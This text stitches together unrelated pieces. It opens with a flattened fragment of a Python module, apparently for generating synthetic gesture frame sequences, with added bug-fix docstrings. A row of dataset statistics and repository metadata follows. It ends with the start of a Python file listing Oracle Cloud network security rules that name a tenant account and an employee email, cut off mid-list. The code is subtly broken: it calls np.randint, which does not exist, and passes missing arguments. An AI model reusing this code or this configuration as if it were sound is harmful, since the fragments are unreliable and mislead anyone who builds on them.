# drawImage(frame)
return frames, labelA
def GenForeFinger(size):
frames = list()
labelA = list()
frame = np.zeros((size, size))
frames.append(frame)
radius = np.randint(5, 7) / 10
xratio = np.randint(1, 3)
yratio = np.randint(1, 3)
labelA.append('ForeFingureWash')
for i in range(1, size):
i = float(i) / float(size)
column, row = generate_Heart(1, i, 0.5)
# frame = np.zeros((size, size))
frame, step = next_frameDampedHeart(int(row * size / xratio), frame, int(column * size / yratio))
frames.append(frame)
# labelA.append('ForeFingureWash')
return frames, labelA
def GenForeFingerDuration(size):
frames = list()
labelA = list()
frame = np.zeros((size, size))
frames.append(frame)
radius = np.randint(5, 7) / 10
xratio = np.randint(1, 3)
yratio = np.randint(1, 3)
duration = np.randint(3, 10) / 10
labelA.append('ForeFingureWash')
for i in range(1, size):
i = float(i) / float(size)
column, row = generate_HeartDuration(duration, i, 0.5)
frame = np.zeros((size, size))
frame, step = next_frameDampedHeart(int(row * size / xratio), frame, int(column * size / yratio))
frames.append(frame)
# labelA.append('ForeFingureWash')
# drawImage(frame)
return frames, labelA
# generate a sequence of frames of a dot moving across an image
def build_frames2(size, timeStep=0):
frames = list()
labelA = list()
labelB = list()
labelC = list()
# create the first frame
fa, la = GenForeFinger()
frames += fa
labelA += la
fa, la = GenNailLeft()
frames += fa
labelA += la
fa, la = GenNailRight()
frames += fa
labelA += la
fa, la = GenThumbFinger()
frames += fa
labelA += la
return frames, labelA
'''
# generate a sequence of frames of a dot moving across an image
def build_frames_DB_A(size, timeStep=0, shuff=False):
    """Build one sample: four period-80 gestures (optionally in shuffled
    order), each zero-padded with background frames up to ``size`` frames.

    Returns (frames, labels) with one label per gesture segment (plus a
    'Background' label for each padding segment).

    Fixes: removed unused locals (labelB/labelC/fat/lat) and the accidental
    double indirection ``my_list[res[i]]`` while iterating ``res`` itself —
    the gestures now run in the (possibly shuffled) ``res`` order directly.
    """
    frames = list()
    labelA = list()
    my_list = [GestureA, GestureB, GestureC, GestureD]
    res = [0, 1, 2, 3]
    if shuff:
        random.shuffle(res)
    for idx in res:
        fa, la = my_list[idx](period=80, size=size)
        frames += fa
        labelA += la
        # pad this gesture's segment with background frames
        if size - len(fa) > 0:
            fa, la = GestureBackground(size, period=size - len(fa))
            frames += fa
            labelA += la
    return frames, labelA
def build_frames_DB_B(size, timeStep=0, shuff=False):
    """Build one sample: four type-1 gestures (optionally shuffled), each
    zero-padded with background frames up to ``size`` frames.

    Fixes: removed unused locals (labelB/labelC/fat/lat) and the accidental
    double indirection ``my_list[res[i]]`` while iterating ``res`` itself.
    """
    frames = list()
    labelA = list()
    my_list = [GestureA, GestureB, GestureC, GestureD]
    res = [0, 1, 2, 3]
    if shuff:
        random.shuffle(res)
    for idx in res:
        fa, la = my_list[idx](size, type=1)
        frames += fa
        labelA += la
        # pad this gesture's segment with background frames
        if size - len(fa) > 0:
            fa, la = GestureBackground(size, period=size - len(fa))
            frames += fa
            labelA += la
    return frames, labelA
def build_frames_DB_C(size, timeStep=0, shuff=False):
    """Build one sample: four type-2 gestures separated by 5 background
    frames each (no separator after the last), then padded with background
    up to size * 4 total frames.

    Fixes: removed unused locals (labelB/labelC/fat/lat) and the accidental
    double indirection ``my_list[res[i]]`` while iterating ``res`` itself.
    """
    frames = list()
    labelA = list()
    my_list = [GestureA, GestureB, GestureC, GestureD]
    res = [0, 1, 2, 3]
    if shuff:
        random.shuffle(res)
    for position, idx in enumerate(res):
        fa, la = my_list[idx](size, type=2)
        frames += fa
        labelA += la
        # 5-frame background separator between gestures (not after the last)
        if position != 3:
            fa, la = GestureBackground(size, period=5)
            frames += fa
            labelA += la
    # final padding so every sample has exactly size * 4 frames
    if size * 4 - len(frames) > 0:
        fa, la = GestureBackground(size, period=size * 4 - len(frames))
        frames += fa
        labelA += la
    return frames, labelA
def build_frames_DB_D(size, timeStep=0, shuff=False):
    """Build one sample: four type-2 gestures back to back (optionally in
    shuffled order), with no background padding.

    Fixes: removed unused locals (labelB/labelC) and the accidental double
    indirection ``my_list[res[i]]`` while iterating ``res`` itself.
    """
    frames = list()
    labelA = list()
    my_list = [GestureA, GestureB, GestureC, GestureD]
    res = [0, 1, 2, 3]
    if shuff:
        random.shuffle(res)
    for idx in res:
        fa, la = my_list[idx](size, type=2)
        frames += fa
        labelA += la
    return frames, labelA
# generate a sequence of frames of a dot moving across an image
def build_framesRandomDuration(size, timeStep=0, shuff=False):
    """Build a sequence from the four random-duration gesture generators.

    :param size: forwarded to each duration-based gesture generator.
    :param timeStep: unused; kept for signature compatibility.
    :param shuff: when True, randomize the order of the four gestures.
    :return: ``(frames, labels)`` — parallel lists of frames and labels.
    """
    frames = []
    labelA = []
    gestures = [GenNailLeftDuration, GenNailRightDuration, GenThumbFingerDuration, GenForeFingerDuration]
    order = [0, 1, 2, 3]
    if shuff:
        # BUG FIX: the original called np.rand.shuffle, which does not exist
        # (numpy exposes np.random) and raised AttributeError whenever
        # shuff=True; use random.shuffle like the sibling builders.
        random.shuffle(order)
    for idx in order:
        # FIX: original indexed gestures[order[idx]] while iterating the
        # values of `order`, applying the shuffle permutation twice.
        fa, la = gestures[idx](size)
        frames += fa
        labelA += la
    return frames, labelA
def validateData():
    """Visual sanity check: build one frame sequence and render it with pyplot.

    Side effects only (draws on the current pyplot figure); returns nothing.
    """
    # generate sequence of frames
    size = 30
    frames, right = build_frames(size)
    # plot all frames (older single-row implementation kept below, disabled)
    '''
    f=pyplot.figure(figsize=(5,5))
    for seq in range(4):
    for i in range((size ) ):
    # create a grayscale subplot for each frame
    ax=f.add_subplot(1, (size +1) * 4 , (size +1) * seq +i +1)
    ax.imshow(frames[(size ) * seq +i], cmap='Greys')
    # turn of the scale to make it cleaer
    #ax = pyplot.gca()
    ax.get_xaxis().set_visible(False)
    ax.get_yaxis().set_visible(False)
    # show the plot
    pyplot.show()
    pyplot.savefig('fig.png')
    '''
    # grid: 2 rows, one column per frame plus one separator column per sequence
    f, ax = pyplot.subplots(2, (size + 1) * 4, figsize=((size + 1) * 4, 20), sharey=True)
    # make a little extra space between the subplots
    f.subplots_adjust(hspace=0.5)
    # ax[0, 0].set_title("Image A", fontsize=15)
    # the second row is unused: hide all its axes
    for i in range((size + 1) * 4):
        ax[1, i].set_axis_off()
    # only row 0 is populated (range(0, 1))
    for row in range(0, 1):
        for seq in range(4):
            for i in range((size)):
                # frame i of sequence `seq`; column index skips one separator
                # slot per sequence, hence the (size + 1) stride
                ax[row, (size + 1) * seq + i].imshow(frames[(size) * seq + i], cmap='Greys')
                ax[row, (size + 1) * seq + i].set_axis_off()
                # also hides the separator column once i reaches size - 1
                # NOTE(review): flattened source is ambiguous about whether
                # this line sat inside or after the i-loop — confirm intent
                ax[row, (size + 1) * seq + i + 1].set_axis_off()
    # pyplot.show()
    # pyplot.savefig('fig.png')
# generate multiple sequences of frames and reshape for network input
def generate_examples(size, n_patterns):
    """Produce ``n_patterns`` gesture sequences shaped for network input.

    :param size: frame-sequence parameter forwarded to ``build_frames``.
    :param n_patterns: number of sequences to generate.
    :return: ``(X, labels)`` — X shaped [n_patterns, size*4, size, size, 1]
        and labels one-hot encoded over 4 classes.
    """
    samples, encoded = [], []
    for _ in range(n_patterns):
        seq_frames, seq_labels = build_frames(size)
        # integer-encode this sequence's label strings
        encoder = LabelEncoder()
        codes = encoder.fit_transform(np.array(seq_labels))
        samples.append(seq_frames)
        encoded.append(codes)
    # resize as [samples, timesteps, width, height, channels]
    X = np.array(samples).reshape(n_patterns, size * 4, size, size, 1)
    y = np.array(encoded).reshape(n_patterns, 4)
    labels = to_categorical(y, 4)
    return X, labels
# generate multiple sequences of frames and reshape for network input
def generate_sample(size, n_patterns, parameter=None):
    """Produce ``n_patterns`` sequences from ``build_frames2`` for the network.

    :param size: frame-sequence parameter forwarded to ``build_frames2``.
    :param n_patterns: number of sequences to generate.
    :param parameter: unused; kept for signature compatibility.
    :return: ``(X, labels)`` — X shaped [n_patterns, timesteps, size, size, 1]
        and labels one-hot encoded over 4 classes.
    """
    samples, encoded = [], []
    for _ in range(n_patterns):
        seq_frames, seq_labels = build_frames2(size)
        # integer-encode this sequence's label strings
        encoder = LabelEncoder()
        codes = encoder.fit_transform(np.array(seq_labels))
        samples.append(seq_frames)
        encoded.append(codes)
    # resize as [samples, timesteps, width, height, channels]
    X = np.array(samples).reshape(n_patterns, len(samples[0]), size, size, 1)
    y = np.array(encoded).reshape(n_patterns, 4)
    labels = to_categorical(y, 4)
    return X, labels
# generate multiple sequences of frames and reshape for network input
def generate_DB_A(size, n_patterns, parameter=None):
    """Generate ``n_patterns`` dataset-A sequences shaped for network input.

    :param size: forwarded to ``build_frames_DB_A``.
    :param n_patterns: number of sequences to generate.
    :param parameter: optional dict; ``parameter['shuff'][0]`` toggles gesture
        shuffling. Defaults to no shuffling when omitted.
    :return: ``(X, labels)`` — X shaped [n_patterns, timesteps, size, size, 1]
        and labels one-hot encoded over 5 classes.
    """
    # BUG FIX: the declared default parameter=None used to crash on
    # parameter['shuff'][0]; fall back to no shuffling instead.
    shuff = parameter['shuff'][0] if parameter else False
    X, y = list(), list()
    for i in range(n_patterns):
        print("gen{}/{}".format(i, n_patterns))
        frames, labels = build_frames_DB_A(size=size, shuff=shuff)
        # integer-encode this sequence's label strings
        label_encoder = LabelEncoder()
        vec = label_encoder.fit_transform(np.array(labels))
        X.append(frames)
        y.append(vec)
    # resize as [samples, timesteps, width, height, channels]
    X = np.array(X).reshape(n_patterns, len(X[0]), size, size, 1)
    labels = to_categorical(y, 5)
    return X, labels
# generate multiple sequences of frames and reshape for network input
def generate_DB_B(size, n_patterns, parameter=None):
    """Generate ``n_patterns`` dataset-B sequences shaped for network input.

    :param size: forwarded to ``build_frames_DB_B``.
    :param n_patterns: number of sequences to generate.
    :param parameter: optional dict; ``parameter['shuff'][0]`` toggles gesture
        shuffling. Defaults to no shuffling when omitted.
    :return: ``(X, labels)`` — X shaped [n_patterns, timesteps, size, size, 1]
        and labels one-hot encoded over 5 classes.
    """
    # BUG FIX: the declared default parameter=None used to crash on
    # parameter['shuff'][0]; fall back to no shuffling instead.
    shuff = parameter['shuff'][0] if parameter else False
    X, y = list(), list()
    for i in range(n_patterns):
        print("gen{}/{}".format(i, n_patterns))
        frames, labels = build_frames_DB_B(size, shuff=shuff)
        # integer-encode this sequence's label strings
        label_encoder = LabelEncoder()
        vec = label_encoder.fit_transform(np.array(labels))
        X.append(frames)
        y.append(vec)
    # resize as [samples, timesteps, width, height, channels]
    X = np.array(X).reshape(n_patterns, len(X[0]), size, size, 1)
    labels = to_categorical(y, 5)
    return X, labels
# generate multiple sequences of frames and reshape for network input
def generate_DB_C(size, n_patterns, parameter=None):
    """Generate ``n_patterns`` dataset-C sequences shaped for network input.

    :param size: forwarded to ``build_frames_DB_C``.
    :param n_patterns: number of sequences to generate.
    :param parameter: optional dict; ``parameter['shuff'][0]`` toggles gesture
        shuffling. Defaults to no shuffling when omitted.
    :return: ``(X, labels)`` — X shaped [n_patterns, timesteps, size, size, 1]
        and labels one-hot encoded over 5 classes.
    """
    # BUG FIX: the declared default parameter=None used to crash on
    # parameter['shuff'][0]; fall back to no shuffling instead.
    shuff = parameter['shuff'][0] if parameter else False
    X, y = list(), list()
    for i in range(n_patterns):
        print("gen{}/{}".format(i, n_patterns))
        frames, labels = build_frames_DB_C(size, shuff=shuff)
        # integer-encode this sequence's label strings
        label_encoder = LabelEncoder()
        vec = label_encoder.fit_transform(np.array(labels))
        X.append(frames)
        y.append(vec)
    # resize as [samples, timesteps, width, height, channels]
    X = np.array(X).reshape(n_patterns, len(X[0]), size, size, 1)
    labels = to_categorical(y, 5)
    return X, labels
def generate_DB_D(size, n_patterns, parameter=None):
    """Generate ``n_patterns`` dataset-D sequences shaped for network input.

    :param size: forwarded to ``build_frames_DB_D``.
    :param n_patterns: number of sequences to generate.
    :param parameter: optional dict; ``parameter['shuff'][0]`` toggles gesture
        shuffling. Defaults to no shuffling when omitted.
    :return: ``(X, labels)`` — X shaped [n_patterns, timesteps, size, size, 1]
        and labels one-hot encoded over 5 classes.
    """
    # BUG FIX: the declared default parameter=None used to crash on
    # parameter['shuff'][0]; fall back to no shuffling instead.
    shuff = parameter['shuff'][0] if parameter else False
    X, y = list(), list()
    for i in range(n_patterns):
        print("gen{}/{}".format(i, n_patterns))
        frames, labels = build_frames_DB_D(size, shuff=shuff)
        # integer-encode this sequence's label strings
        label_encoder = LabelEncoder()
        vec = label_encoder.fit_transform(np.array(labels))
        X.append(frames)
        y.append(vec)
    # resize as [samples, timesteps, width, height, channels]
    X = np.array(X).reshape(n_patterns, len(X[0]), size, size, 1)
    labels = to_categorical(y, 5)
    return X, labels
| 30.022989 | 106 | 0.565371 | 4,621 | 31,344 | 3.781865 | 0.059295 | 0.028325 | 0.013046 | 0.032044 | 0.880922 | 0.869879 | 0.838808 | 0.828279 | 0.814202 | 0.811685 | 0 | 0.041382 | 0.286083 | 31,344 | 1,043 | 107 | 30.051774 | 0.739599 | 0.121427 | 0 | 0.773214 | 0 | 0 | 0.007862 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.058929 | false | 0 | 0.0125 | 0.003571 | 0.135714 | 0.007143 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 7 |
c956022f624960842aaf2da3d2d94c1a1f94f375 | 90,546 | py | Python | gc3_query/var/scratchpad/beta_01/security_rules_data.py | ericmharris/gc3-query | 0bf5226130aafbb1974aeb96d93ee1996833e87d | [
"MIT"
] | null | null | null | gc3_query/var/scratchpad/beta_01/security_rules_data.py | ericmharris/gc3-query | 0bf5226130aafbb1974aeb96d93ee1996833e87d | [
"MIT"
] | null | null | null | gc3_query/var/scratchpad/beta_01/security_rules_data.py | ericmharris/gc3-query | 0bf5226130aafbb1974aeb96d93ee1996833e87d | [
"MIT"
] | null | null | null | # -*- coding: utf-8 -*-
"""
#@Filename : security_rules_data
#@Date : [8/8/2018 12:15 PM]
#@Poject: gc3-query
#@AUTHOR : emharris
~~~~~~~~~~~~~~~~
<DESCR SHORT>
<DESCR>
"""
################################################################################
## Standard Library Imports
################################################################################
## Third-Party Imports
################################################################################
## Project Imports
from gc3_query.lib import get_logging
_debug, _info, _warning, _error, _critical = get_logging(name=__name__)
secrules = [{'name': '/Compute-587626604/default/egress',
'uri': 'https://compute.uscom-central-1.oraclecloud.com:443/network/v1/secrule/Compute-587626604/default/egress',
'description': 'Default egress Network Security Rule', 'tags': [], 'acl': '/Compute-587626604/default',
'flowDirection': 'egress', 'srcVnicSet': '/Compute-587626604/default', 'dstVnicSet': None, 'srcIpAddressPrefixSets': [],
'dstIpAddressPrefixSets': [], 'secProtocols': [], 'enabledFlag': True},
{'name': '/Compute-587626604/manjunath.udupa@oracle.com/paas/JaaS/gc3oladdoam726/wls/ora_p2admin_ahttps',
'uri': 'https://compute.uscom-central-1.oraclecloud.com:443/network/v1/secrule/Compute-587626604/manjunath.udupa@oracle.com/paas/JaaS/gc3oladdoam726/wls/ora_p2admin_ahttps',
'description': None, 'tags': [],
'acl': '/Compute-587626604/manjunath.udupa@oracle.com/paas/JaaS/gc3oladdoam726/wls/ora_acl_default',
'flowDirection': 'ingress', 'srcVnicSet': None,
'dstVnicSet': '/Compute-587626604/manjunath.udupa@oracle.com/paas/JaaS/gc3oladdoam726/wls/ora_admin',
'srcIpAddressPrefixSets': [], 'dstIpAddressPrefixSets': [],
'secProtocols': ['/Compute-587626604/manjunath.udupa@oracle.com/paas/JaaS/gc3oladdoam726/wls/ahttps'], 'enabledFlag': False},
{'name': '/Compute-587626604/manjunath.udupa@oracle.com/paas/JaaS/gc3oladdoam726/wls/sys_infra2wls_admin_ssh',
'uri': 'https://compute.uscom-central-1.oraclecloud.com:443/network/v1/secrule/Compute-587626604/manjunath.udupa@oracle.com/paas/JaaS/gc3oladdoam726/wls/sys_infra2wls_admin_ssh',
'description': None, 'tags': [],
'acl': '/Compute-587626604/manjunath.udupa@oracle.com/paas/JaaS/gc3oladdoam726/wls/ora_acl_default',
'flowDirection': 'ingress', 'srcVnicSet': None,
'dstVnicSet': '/Compute-587626604/manjunath.udupa@oracle.com/paas/JaaS/gc3oladdoam726/wls/ora_wls_infraadmin',
'srcIpAddressPrefixSets': ['/oracle/public/paas-infra'], 'dstIpAddressPrefixSets': [],
'secProtocols': ['/Compute-587626604/manjunath.udupa@oracle.com/paas/JaaS/gc3oladdoam726/wls/ssh'], 'enabledFlag': True},
{'name': '/Compute-587626604/manjunath.udupa@oracle.com/paas/JaaS/gc3oladdoam726/lb/ora_otd_infraadmin_ingress_self',
'uri': 'https://compute.uscom-central-1.oraclecloud.com:443/network/v1/secrule/Compute-587626604/manjunath.udupa@oracle.com/paas/JaaS/gc3oladdoam726/lb/ora_otd_infraadmin_ingress_self',
'description': None, 'tags': [],
'acl': '/Compute-587626604/manjunath.udupa@oracle.com/paas/JaaS/gc3oladdoam726/lb/ora_acl_default', 'flowDirection': 'ingress',
'srcVnicSet': '/Compute-587626604/manjunath.udupa@oracle.com/paas/JaaS/gc3oladdoam726/lb/ora_otd_infraadmin',
'dstVnicSet': '/Compute-587626604/manjunath.udupa@oracle.com/paas/JaaS/gc3oladdoam726/lb/ora_otd_infraadmin',
'srcIpAddressPrefixSets': [], 'dstIpAddressPrefixSets': [], 'secProtocols': [], 'enabledFlag': True},
{'name': '/Compute-587626604/manjunath.udupa@oracle.com/dbaas/gc3oladdoam725/db_1/ora_db_ingress_self',
'uri': 'https://compute.uscom-central-1.oraclecloud.com:443/network/v1/secrule/Compute-587626604/manjunath.udupa@oracle.com/dbaas/gc3oladdoam725/db_1/ora_db_ingress_self',
'description': None, 'tags': [],
'acl': '/Compute-587626604/manjunath.udupa@oracle.com/dbaas/gc3oladdoam725/db_1/ora_acl_default', 'flowDirection': 'ingress',
'srcVnicSet': '/Compute-587626604/manjunath.udupa@oracle.com/dbaas/gc3oladdoam725/db_1/ora_db',
'dstVnicSet': '/Compute-587626604/manjunath.udupa@oracle.com/dbaas/gc3oladdoam725/db_1/ora_db', 'srcIpAddressPrefixSets': [],
'dstIpAddressPrefixSets': [], 'secProtocols': [], 'enabledFlag': True}, {'name': '/Compute-587626604/default/ingress',
'uri': 'https://compute.uscom-central-1.oraclecloud.com:443/network/v1/secrule/Compute-587626604/default/ingress',
'description': 'Default ingress Network Security Rule',
'tags': [], 'acl': '/Compute-587626604/default',
'flowDirection': 'ingress',
'srcVnicSet': '/Compute-587626604/default',
'dstVnicSet': '/Compute-587626604/default',
'srcIpAddressPrefixSets': [],
'dstIpAddressPrefixSets': [], 'secProtocols': [],
'enabledFlag': True},
{'name': '/Compute-587626604/manjunath.udupa@oracle.com/paas/JaaS/gc3oladdoam726/wls/ora_wls2db_dbport',
'uri': 'https://compute.uscom-central-1.oraclecloud.com:443/network/v1/secrule/Compute-587626604/manjunath.udupa@oracle.com/paas/JaaS/gc3oladdoam726/wls/ora_wls2db_dbport',
'description': None, 'tags': [],
'acl': '/Compute-587626604/manjunath.udupa@oracle.com/dbaas/gc3oladdoam725/db_1/ora_acl_default', 'flowDirection': 'ingress',
'srcVnicSet': '/Compute-587626604/manjunath.udupa@oracle.com/paas/JaaS/gc3oladdoam726/wls/ora_ms',
'dstVnicSet': '/Compute-587626604/manjunath.udupa@oracle.com/dbaas/gc3oladdoam725/db_1/ora_db', 'srcIpAddressPrefixSets': [],
'dstIpAddressPrefixSets': [],
'secProtocols': ['/Compute-587626604/manjunath.udupa@oracle.com/paas/JaaS/gc3oladdoam726/wls/dbport'], 'enabledFlag': True},
{'name': '/Compute-587626604/manjunath.udupa@oracle.com/paas/JaaS/gc3oladdoam726/wls/ora_p2ms_chttp',
'uri': 'https://compute.uscom-central-1.oraclecloud.com:443/network/v1/secrule/Compute-587626604/manjunath.udupa@oracle.com/paas/JaaS/gc3oladdoam726/wls/ora_p2ms_chttp',
'description': None, 'tags': [],
'acl': '/Compute-587626604/manjunath.udupa@oracle.com/paas/JaaS/gc3oladdoam726/wls/ora_acl_default',
'flowDirection': 'ingress', 'srcVnicSet': None,
'dstVnicSet': '/Compute-587626604/manjunath.udupa@oracle.com/paas/JaaS/gc3oladdoam726/wls/ora_ms',
'srcIpAddressPrefixSets': [], 'dstIpAddressPrefixSets': [],
'secProtocols': ['/Compute-587626604/manjunath.udupa@oracle.com/paas/JaaS/gc3oladdoam726/wls/chttp'], 'enabledFlag': True},
{'name': '/Compute-587626604/manjunath.udupa@oracle.com/paas/JaaS/gc3oladdoam726/lb/ora_p2otd_ssh',
'uri': 'https://compute.uscom-central-1.oraclecloud.com:443/network/v1/secrule/Compute-587626604/manjunath.udupa@oracle.com/paas/JaaS/gc3oladdoam726/lb/ora_p2otd_ssh',
'description': None, 'tags': [],
'acl': '/Compute-587626604/manjunath.udupa@oracle.com/paas/JaaS/gc3oladdoam726/lb/ora_acl_default', 'flowDirection': 'ingress',
'srcVnicSet': None, 'dstVnicSet': '/Compute-587626604/manjunath.udupa@oracle.com/paas/JaaS/gc3oladdoam726/lb/ora_otd',
'srcIpAddressPrefixSets': [], 'dstIpAddressPrefixSets': [],
'secProtocols': ['/Compute-587626604/manjunath.udupa@oracle.com/paas/JaaS/gc3oladdoam726/lb/ssh'], 'enabledFlag': True},
{'name': '/Compute-587626604/manjunath.udupa@oracle.com/paas/JaaS/gc3oladdoam726/wls/ora_wls_infraadmin_egress_all',
'uri': 'https://compute.uscom-central-1.oraclecloud.com:443/network/v1/secrule/Compute-587626604/manjunath.udupa@oracle.com/paas/JaaS/gc3oladdoam726/wls/ora_wls_infraadmin_egress_all',
'description': None, 'tags': [],
'acl': '/Compute-587626604/manjunath.udupa@oracle.com/paas/JaaS/gc3oladdoam726/wls/ora_acl_default', 'flowDirection': 'egress',
'srcVnicSet': '/Compute-587626604/manjunath.udupa@oracle.com/paas/JaaS/gc3oladdoam726/wls/ora_wls_infraadmin',
'dstVnicSet': None, 'srcIpAddressPrefixSets': [], 'dstIpAddressPrefixSets': [], 'secProtocols': [], 'enabledFlag': True},
{'name': '/Compute-587626604/manjunath.udupa@oracle.com/paas/JaaS/gc3oladdoam726/wls/ora_wls_infraadmin_ingress_self',
'uri': 'https://compute.uscom-central-1.oraclecloud.com:443/network/v1/secrule/Compute-587626604/manjunath.udupa@oracle.com/paas/JaaS/gc3oladdoam726/wls/ora_wls_infraadmin_ingress_self',
'description': None, 'tags': [],
'acl': '/Compute-587626604/manjunath.udupa@oracle.com/paas/JaaS/gc3oladdoam726/wls/ora_acl_default',
'flowDirection': 'ingress',
'srcVnicSet': '/Compute-587626604/manjunath.udupa@oracle.com/paas/JaaS/gc3oladdoam726/wls/ora_wls_infraadmin',
'dstVnicSet': '/Compute-587626604/manjunath.udupa@oracle.com/paas/JaaS/gc3oladdoam726/wls/ora_wls_infraadmin',
'srcIpAddressPrefixSets': [], 'dstIpAddressPrefixSets': [], 'secProtocols': [], 'enabledFlag': True},
{'name': '/Compute-587626604/manjunath.udupa@oracle.com/paas/APICS/gc3oladdoam728/1/lb/ora_otd_ingress_self',
'uri': 'https://compute.uscom-central-1.oraclecloud.com:443/network/v1/secrule/Compute-587626604/manjunath.udupa@oracle.com/paas/APICS/gc3oladdoam728/1/lb/ora_otd_ingress_self',
'description': None, 'tags': [],
'acl': '/Compute-587626604/manjunath.udupa@oracle.com/paas/APICS/gc3oladdoam728/1/lb/ora_acl_default',
'flowDirection': 'ingress',
'srcVnicSet': '/Compute-587626604/manjunath.udupa@oracle.com/paas/APICS/gc3oladdoam728/1/lb/ora_otd',
'dstVnicSet': '/Compute-587626604/manjunath.udupa@oracle.com/paas/APICS/gc3oladdoam728/1/lb/ora_otd',
'srcIpAddressPrefixSets': [], 'dstIpAddressPrefixSets': [], 'secProtocols': [], 'enabledFlag': True},
{'name': '/Compute-587626604/manjunath.udupa@oracle.com/paas/APICS/gc3oladdoam728/1/lb/ora_otd_egress_all',
'uri': 'https://compute.uscom-central-1.oraclecloud.com:443/network/v1/secrule/Compute-587626604/manjunath.udupa@oracle.com/paas/APICS/gc3oladdoam728/1/lb/ora_otd_egress_all',
'description': None, 'tags': [],
'acl': '/Compute-587626604/manjunath.udupa@oracle.com/paas/APICS/gc3oladdoam728/1/lb/ora_acl_default',
'flowDirection': 'egress',
'srcVnicSet': '/Compute-587626604/manjunath.udupa@oracle.com/paas/APICS/gc3oladdoam728/1/lb/ora_otd', 'dstVnicSet': None,
'srcIpAddressPrefixSets': [], 'dstIpAddressPrefixSets': [], 'secProtocols': [], 'enabledFlag': True},
{'name': '/Compute-587626604/manjunath.udupa@oracle.com/paas/APICS/gc3oladdoam728/1/lb/sys_infra2otd_admin_ssh',
'uri': 'https://compute.uscom-central-1.oraclecloud.com:443/network/v1/secrule/Compute-587626604/manjunath.udupa@oracle.com/paas/APICS/gc3oladdoam728/1/lb/sys_infra2otd_admin_ssh',
'description': None, 'tags': [],
'acl': '/Compute-587626604/manjunath.udupa@oracle.com/paas/APICS/gc3oladdoam728/1/lb/ora_acl_default',
'flowDirection': 'ingress', 'srcVnicSet': None,
'dstVnicSet': '/Compute-587626604/manjunath.udupa@oracle.com/paas/APICS/gc3oladdoam728/1/lb/ora_otd_infraadmin',
'srcIpAddressPrefixSets': ['/oracle/public/paas-infra'], 'dstIpAddressPrefixSets': [],
'secProtocols': ['/Compute-587626604/manjunath.udupa@oracle.com/paas/APICS/gc3oladdoam728/1/lb/ssh'], 'enabledFlag': True},
{'name': '/Compute-587626604/manjunath.udupa@oracle.com/paas/APICS/gc3oladdoam728/1/lb/ora_otd_infraadmin_ingress_self',
'uri': 'https://compute.uscom-central-1.oraclecloud.com:443/network/v1/secrule/Compute-587626604/manjunath.udupa@oracle.com/paas/APICS/gc3oladdoam728/1/lb/ora_otd_infraadmin_ingress_self',
'description': None, 'tags': [],
'acl': '/Compute-587626604/manjunath.udupa@oracle.com/paas/APICS/gc3oladdoam728/1/lb/ora_acl_default',
'flowDirection': 'ingress',
'srcVnicSet': '/Compute-587626604/manjunath.udupa@oracle.com/paas/APICS/gc3oladdoam728/1/lb/ora_otd_infraadmin',
'dstVnicSet': '/Compute-587626604/manjunath.udupa@oracle.com/paas/APICS/gc3oladdoam728/1/lb/ora_otd_infraadmin',
'srcIpAddressPrefixSets': [], 'dstIpAddressPrefixSets': [], 'secProtocols': [], 'enabledFlag': True},
{'name': '/Compute-587626604/manjunath.udupa@oracle.com/dbaas/gc3oladdoam725/db_1/ora_p2_httpssl',
'uri': 'https://compute.uscom-central-1.oraclecloud.com:443/network/v1/secrule/Compute-587626604/manjunath.udupa@oracle.com/dbaas/gc3oladdoam725/db_1/ora_p2_httpssl',
'description': None, 'tags': [],
'acl': '/Compute-587626604/manjunath.udupa@oracle.com/dbaas/gc3oladdoam725/db_1/ora_acl_default', 'flowDirection': 'ingress',
'srcVnicSet': None, 'dstVnicSet': '/Compute-587626604/manjunath.udupa@oracle.com/dbaas/gc3oladdoam725/db_1/ora_db',
'srcIpAddressPrefixSets': [], 'dstIpAddressPrefixSets': [],
'secProtocols': ['/Compute-587626604/manjunath.udupa@oracle.com/dbaas/gc3oladdoam725/db_1/httpssl'], 'enabledFlag': True},
{'name': '/Compute-587626604/manjunath.udupa@oracle.com/dbaas/gc3oladdoam725/db_1/ora_db_egress_all',
'uri': 'https://compute.uscom-central-1.oraclecloud.com:443/network/v1/secrule/Compute-587626604/manjunath.udupa@oracle.com/dbaas/gc3oladdoam725/db_1/ora_db_egress_all',
'description': None, 'tags': [],
'acl': '/Compute-587626604/manjunath.udupa@oracle.com/dbaas/gc3oladdoam725/db_1/ora_acl_default', 'flowDirection': 'egress',
'srcVnicSet': '/Compute-587626604/manjunath.udupa@oracle.com/dbaas/gc3oladdoam725/db_1/ora_db', 'dstVnicSet': None,
'srcIpAddressPrefixSets': [], 'dstIpAddressPrefixSets': [], 'secProtocols': [], 'enabledFlag': True},
{'name': '/Compute-587626604/manjunath.udupa@oracle.com/dbaas/gc3oladdoam725/db_1/ora_p2_http',
'uri': 'https://compute.uscom-central-1.oraclecloud.com:443/network/v1/secrule/Compute-587626604/manjunath.udupa@oracle.com/dbaas/gc3oladdoam725/db_1/ora_p2_http',
'description': None, 'tags': [],
'acl': '/Compute-587626604/manjunath.udupa@oracle.com/dbaas/gc3oladdoam725/db_1/ora_acl_default', 'flowDirection': 'ingress',
'srcVnicSet': None, 'dstVnicSet': '/Compute-587626604/manjunath.udupa@oracle.com/dbaas/gc3oladdoam725/db_1/ora_db',
'srcIpAddressPrefixSets': [], 'dstIpAddressPrefixSets': [],
'secProtocols': ['/Compute-587626604/manjunath.udupa@oracle.com/dbaas/gc3oladdoam725/db_1/http'], 'enabledFlag': False},
{'name': '/Compute-587626604/manjunath.udupa@oracle.com/dbaas/gc3oladdoam725/db_1/ora_p2_dbconsole',
'uri': 'https://compute.uscom-central-1.oraclecloud.com:443/network/v1/secrule/Compute-587626604/manjunath.udupa@oracle.com/dbaas/gc3oladdoam725/db_1/ora_p2_dbconsole',
'description': None, 'tags': [],
'acl': '/Compute-587626604/manjunath.udupa@oracle.com/dbaas/gc3oladdoam725/db_1/ora_acl_default', 'flowDirection': 'ingress',
'srcVnicSet': None, 'dstVnicSet': '/Compute-587626604/manjunath.udupa@oracle.com/dbaas/gc3oladdoam725/db_1/ora_db',
'srcIpAddressPrefixSets': [], 'dstIpAddressPrefixSets': [],
'secProtocols': ['/Compute-587626604/manjunath.udupa@oracle.com/dbaas/gc3oladdoam725/db_1/dbconsole'], 'enabledFlag': False},
